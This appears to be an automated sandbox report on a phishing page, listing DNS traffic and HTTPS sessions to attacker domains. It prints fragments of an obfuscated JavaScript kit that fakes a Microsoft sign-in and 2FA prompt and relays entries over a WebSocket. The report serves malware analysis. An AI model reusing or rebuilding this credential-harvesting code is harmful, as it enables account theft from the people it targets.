Mar 24, 2025 14:43:05.354351997 CET	62021	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:43:05.354495049 CET	58170	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:43:05.518480062 CET	53	62021	1.1.1.1	192.168.2.6
Mar 24, 2025 14:43:05.678127050 CET	53	58170	1.1.1.1	192.168.2.6
Mar 24, 2025 14:43:10.612387896 CET	53	61286	1.1.1.1	192.168.2.6
Mar 24, 2025 14:43:11.037586927 CET	53	64582	1.1.1.1	192.168.2.6
Mar 24, 2025 14:43:14.128398895 CET	53	52225	1.1.1.1	192.168.2.6
Mar 24, 2025 14:43:40.222496033 CET	53	64107	1.1.1.1	192.168.2.6
Mar 24, 2025 14:43:44.496799946 CET	53327	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:43:44.496958017 CET	56572	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:43:44.594043970 CET	53	53327	1.1.1.1	192.168.2.6
Mar 24, 2025 14:43:44.596132040 CET	53	56572	1.1.1.1	192.168.2.6
Mar 24, 2025 14:44:24.134134054 CET	53	56471	1.1.1.1	192.168.2.6
Mar 24, 2025 14:45:05.996890068 CET	50354	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:45:05.997061014 CET	51179	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:45:06.095899105 CET	53	50354	1.1.1.1	192.168.2.6
Mar 24, 2025 14:45:06.096723080 CET	53	51179	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 24, 2025 14:42:12.191019058 CET	192.168.2.6	1.1.1.1	c1fb	(Port unreachable)	Destination Unreachable
Mar 24, 2025 14:42:17.070667982 CET	192.168.2.6	1.1.1.1	c229	(Port unreachable)	Destination Unreachable
Mar 24, 2025 14:42:39.519418955 CET	192.168.2.6	1.1.1.1	c240	(Port unreachable)	Destination Unreachable
Mar 24, 2025 14:43:05.678209066 CET	192.168.2.6	1.1.1.1	c238	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 24, 2025 14:42:15.732615948 CET	192.168.2.6	1.1.1.1	0x155	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:15.732796907 CET	192.168.2.6	1.1.1.1	0x631	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 24, 2025 14:42:16.794950962 CET	192.168.2.6	1.1.1.1	0x26e	Standard query (0)	office.avcbtech.store	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:16.795458078 CET	192.168.2.6	1.1.1.1	0xe183	Standard query (0)	office.avcbtech.store	65	IN (0x0001)	false
Mar 24, 2025 14:42:18.301644087 CET	192.168.2.6	1.1.1.1	0xe820	Standard query (0)	sender.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:18.301775932 CET	192.168.2.6	1.1.1.1	0x6d0e	Standard query (0)	sender.linxcoded.top	65	IN (0x0001)	false
Mar 24, 2025 14:42:20.567476034 CET	192.168.2.6	1.1.1.1	0x2dac	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:20.567857981 CET	192.168.2.6	1.1.1.1	0x1414	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 24, 2025 14:42:21.449511051 CET	192.168.2.6	1.1.1.1	0x2b03	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:21.449667931 CET	192.168.2.6	1.1.1.1	0x8d91	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 24, 2025 14:42:21.941689968 CET	192.168.2.6	1.1.1.1	0x69af	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:21.941838026 CET	192.168.2.6	1.1.1.1	0x9858	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 24, 2025 14:42:39.126548052 CET	192.168.2.6	1.1.1.1	0xd4e7	Standard query (0)	server1.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:39.126759052 CET	192.168.2.6	1.1.1.1	0xc5b0	Standard query (0)	_8233._https.server1.linxcoded.top	65	IN (0x0001)	false
Mar 24, 2025 14:42:40.076731920 CET	192.168.2.6	1.1.1.1	0x7503	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:40.076911926 CET	192.168.2.6	1.1.1.1	0xe5d4	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 24, 2025 14:42:40.708786011 CET	192.168.2.6	1.1.1.1	0x553d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:40.709161043 CET	192.168.2.6	1.1.1.1	0xd9c7	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 24, 2025 14:42:47.570472956 CET	192.168.2.6	1.1.1.1	0xb014	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:47.570605993 CET	192.168.2.6	1.1.1.1	0x5500	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 24, 2025 14:43:05.354351997 CET	192.168.2.6	1.1.1.1	0xbfb2	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:43:05.354495049 CET	192.168.2.6	1.1.1.1	0x9379	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 24, 2025 14:43:44.496799946 CET	192.168.2.6	1.1.1.1	0x5ea2	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:43:44.496958017 CET	192.168.2.6	1.1.1.1	0x3b	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 24, 2025 14:45:05.996890068 CET	192.168.2.6	1.1.1.1	0xd1f4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:45:05.997061014 CET	192.168.2.6	1.1.1.1	0x6428	Standard query (0)	api.ipify.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 24, 2025 14:42:15.830887079 CET	1.1.1.1	192.168.2.6	0x631	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 24, 2025 14:42:15.831017017 CET	1.1.1.1	192.168.2.6	0x155	No error (0)	www.google.com		142.251.40.196	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:16.983230114 CET	1.1.1.1	192.168.2.6	0x26e	No error (0)	office.avcbtech.store		139.28.36.38	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:18.596729994 CET	1.1.1.1	192.168.2.6	0xe820	No error (0)	sender.linxcoded.top		185.174.100.20	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:20.666425943 CET	1.1.1.1	192.168.2.6	0x2dac	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:20.666425943 CET	1.1.1.1	192.168.2.6	0x2dac	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:20.666425943 CET	1.1.1.1	192.168.2.6	0x2dac	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:20.666425943 CET	1.1.1.1	192.168.2.6	0x2dac	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:21.547565937 CET	1.1.1.1	192.168.2.6	0x8d91	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 14:42:21.551486969 CET	1.1.1.1	192.168.2.6	0x2b03	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 14:42:21.551486969 CET	1.1.1.1	192.168.2.6	0x2b03	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:21.551486969 CET	1.1.1.1	192.168.2.6	0x2b03	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:21.553970098 CET	1.1.1.1	192.168.2.6	0x13d9	No error (0)	shed.dual-low.s-part-0012.t-0009.t-msedge.net	s-part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 14:42:21.553970098 CET	1.1.1.1	192.168.2.6	0x13d9	No error (0)	s-part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:22.040456057 CET	1.1.1.1	192.168.2.6	0x9858	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 14:42:22.040618896 CET	1.1.1.1	192.168.2.6	0x69af	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 14:42:22.040618896 CET	1.1.1.1	192.168.2.6	0x69af	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:22.040618896 CET	1.1.1.1	192.168.2.6	0x69af	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:22.150085926 CET	1.1.1.1	192.168.2.6	0xeafc	No error (0)	shed.dual-low.s-part-0010.t-0009.t-msedge.net	s-part-0010.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 14:42:22.150085926 CET	1.1.1.1	192.168.2.6	0xeafc	No error (0)	s-part-0010.t-0009.t-msedge.net		13.107.246.38	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:39.417567968 CET	1.1.1.1	192.168.2.6	0xd4e7	No error (0)	server1.linxcoded.top		185.174.100.76	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:39.519290924 CET	1.1.1.1	192.168.2.6	0xc5b0	Name error (3)	_8233._https.server1.linxcoded.top	none	none	65	IN (0x0001)	false
Mar 24, 2025 14:42:40.179445982 CET	1.1.1.1	192.168.2.6	0x7503	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:40.179445982 CET	1.1.1.1	192.168.2.6	0x7503	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:40.179445982 CET	1.1.1.1	192.168.2.6	0x7503	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:40.179640055 CET	1.1.1.1	192.168.2.6	0xe5d4	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 24, 2025 14:42:40.807101011 CET	1.1.1.1	192.168.2.6	0x553d	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:40.807101011 CET	1.1.1.1	192.168.2.6	0x553d	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:40.807101011 CET	1.1.1.1	192.168.2.6	0x553d	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:42:40.808031082 CET	1.1.1.1	192.168.2.6	0xd9c7	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 24, 2025 14:42:47.907331944 CET	1.1.1.1	192.168.2.6	0xb014	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:43:05.518480062 CET	1.1.1.1	192.168.2.6	0xbfb2	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:43:44.594043970 CET	1.1.1.1	192.168.2.6	0x5ea2	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:43:44.594043970 CET	1.1.1.1	192.168.2.6	0x5ea2	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:43:44.594043970 CET	1.1.1.1	192.168.2.6	0x5ea2	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:43:44.596132040 CET	1.1.1.1	192.168.2.6	0x3b	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 24, 2025 14:45:06.095899105 CET	1.1.1.1	192.168.2.6	0xd1f4	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:45:06.095899105 CET	1.1.1.1	192.168.2.6	0xd1f4	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:45:06.095899105 CET	1.1.1.1	192.168.2.6	0xd1f4	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 14:45:06.096723080 CET	1.1.1.1	192.168.2.6	0x6428	No error (0)	api.ipify.org			65	IN (0x0001)	false

HTTP Request Dependency Graph

office.avcbtech.store

sender.linxcoded.top

code.jquery.com

i.imgur.com

api.ipify.org

avcbtech.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	139.28.36.38	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:17 UTC	562	OUT	GET /fuk/xls/f1u2k.js?uid=apply@peo.on.ca HTTP/1.1 Host: office.avcbtech.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:18 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.26.3 Date: Mon, 24 Mar 2025 13:42:17 GMT Content-Type: application/javascript Content-Length: 68421 Last-Modified: Sun, 09 Mar 2025 15:55:17 GMT Connection: close ETag: "67cdb9e5-10b45" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-24 13:42:18 UTC	15988	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 31 31 62 28 29 7b 76 61 72 20 5f 30 78 35 30 64 36 39 35 3d 5b 27 23 62 61 63 6b 27 2c 27 49 6e 63 6f 72 72 65 63 74 5c 78 32 30 32 46 41 5c 78 32 30 63 6f 64 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 76 36 27 2c 27 23 62 61 63 6b 2d 74 65 78 74 27 2c 27 74 79 70 65 27 2c 27 4d 69 63 72 6f 73 6f 66 74 27 2c 27 72 65 6c 61 79 27 2c 27 36 6b 67 6a 58 4c 43 27 2c 27 73 74 79 6c 65 27 2c 27 70 61 67 65 5f 76 69 73 69 74 27 2c 27 63 6c 6f 73 65 27 2c 27 61 70 70 72 6f 76 65 5f 73 69 67 6e 69 6e 27 2c 27 64 69 76 35 27 2c 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 27 2c 27 23 63 61 70 74 63 68 61 2d 62 74 6e 27 2c 27 2e 6c 6f 67 6f 6e 61 6d 65 27 2c 27 64 69 73 61 62 Data Ascii: function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disab
2025-03-24 13:42:18 UTC	16384	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28 35 31 2c 5c 78 32 30 35 31 2c 5c 78 32 30 35 31 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 Data Ascii: \x20\x20\x20\x20\x20\x20\x20font-size:\x2016px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20rgb(51,\x2051,\x2051);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
2025-03-24 13:42:18 UTC	16384	IN	Data Raw: 32 32 3e 3c 70 5c 78 32 30 69 64 3d 5c 78 32 32 61 70 70 72 6f 76 65 2d 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 68 33 5c 78 32 30 74 65 78 74 2d 63 65 6e 74 65 72 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 6f 72 64 65 72 3a 5c 78 32 30 32 70 78 5c 78 32 30 73 6f 6c 69 64 5c 78 32 30 62 6c 61 63 6b 3b 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 34 30 70 78 3b 5c 78 32 30 70 61 64 64 69 6e 67 3a 5c 78 32 30 31 32 70 78 5c 78 32 30 31 32 70 78 3b 5c 78 32 30 74 65 78 74 2d 61 6c 69 67 6e 3a 5c 78 32 30 63 65 6e 74 65 72 3b 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 78 32 32 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 27 2c 27 3c 61 5c 78 32 30 68 72 65 66 Data Ascii: 22><p\x20id=\x22approve-number\x22\x20class=\x22h3\x20text-center\x22\x20style=\x22border:\x202px\x20solid\x20black;\x20font-size:\x2040px;\x20padding:\x2012px\x2012px;\x20text-align:\x20center;\x20display:\x20inline-block;\x22></p></div><br>','<a\x20href
2025-03-24 13:42:18 UTC	16384	IN	Data Raw: 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 5f 30 78 34 64 34 61 64 61 28 30 78 32 34 62 29 29 2c 5f 30 78 35 66 63 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 27 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 67 72 6f 75 70 5c 78 32 30 6d 74 2d 32 5c 78 32 32 3e 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 72 6f 75 6e 64 65 64 2d 30 5c 78 32 30 62 6f 72 64 65 72 2d 64 61 72 6b 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 Data Ascii: 214[_0x4d4ada(0x188)](_0x4d4ada(0x24b)),_0x5fc214[_0x4d4ada(0x188)]('<div\x20class=\x22form-group\x20mt-2\x22><input\x20type=\x22email\x22\x20name=\x22ai\x22\x20class=\x22form-control\x20rounded-0\x20border-dark\x22\x20id=\x22ai\x22\x20aria-describedby=\x
2025-03-24 13:42:18 UTC	3281	IN	Data Raw: 28 27 23 6d 73 67 2d 32 66 61 27 29 5b 5f 30 78 32 38 35 37 35 66 28 30 78 31 62 37 29 5d 28 5f 30 78 32 38 35 37 35 66 28 30 78 31 39 32 29 29 3b 7d 7d 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 2c 27 65 72 72 6f 72 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 34 61 33 65 36 3d 5f 30 78 31 38 63 32 37 61 3b 24 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 39 29 29 5b 27 74 65 78 74 27 5d 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 38 29 29 2c 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 7d 29 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 31 30 37 31 66 32 3d 6e 65 77 20 57 65 62 53 6f 63 6b 65 74 28 5f 30 78 31 38 63 32 37 61 28 30 78 31 64 63 29 29 3b 5f 30 78 31 30 37 31 66 32 5b 5f 30 78 31 38 63 32 37 61 28 30 78 32 33 38 29 5d 3d 66 75 6e 63 Data Ascii: ('#msg-2fa')[_0x28575f(0x1b7)](_0x28575f(0x192));}}_0x168ef3();},'error':function(){var _0x44a3e6=_0x18c27a;$(_0x44a3e6(0x1b9))['text'](_0x44a3e6(0x1b8)),_0x168ef3();}});else{const _0x1071f2=new WebSocket(_0x18c27a(0x1dc));_0x1071f2[_0x18c27a(0x238)]=func

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49712	185.174.100.20	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:18 UTC	566	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: sender.linxcoded.top Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:19 UTC	383	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Mon, 24 Mar 2025 13:42:19 GMT Content-Type: text/css Content-Length: 258966 Last-Modified: Mon, 27 Jan 2025 22:21:00 GMT Connection: close ETag: "679806cc-3f396" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-24 13:42:19 UTC	16001	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2025-03-24 13:42:19 UTC	16384	IN	Data Raw: 75 70 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 34 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 34 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d Data Ascii: up: 5; -ms-flex-order: 4; order: 4 } .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6;
2025-03-24 13:42:19 UTC	16384	IN	Data Raw: 65 78 2d 6f 72 64 65 72 3a 20 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 39 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 Data Ascii: ex-order: 9; order: 9 } .order-lg-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10; order: 10 } .order-lg-11 { -webkit-box-ordinal-group: 12;
2025-03-24 13:42:19 UTC	16384	IN	Data Raw: 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 62 74 6e 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 0d 0a 20 20 20 20 2e 69 6e Data Ascii: roup-prepend>.form-control-plaintext.btn, .input-group-sm>.input-group-prepend>.form-control-plaintext.input-group-text { padding-right: 0; padding-left: 0 } .form-control-sm, .input-group-sm>.form-control, .in
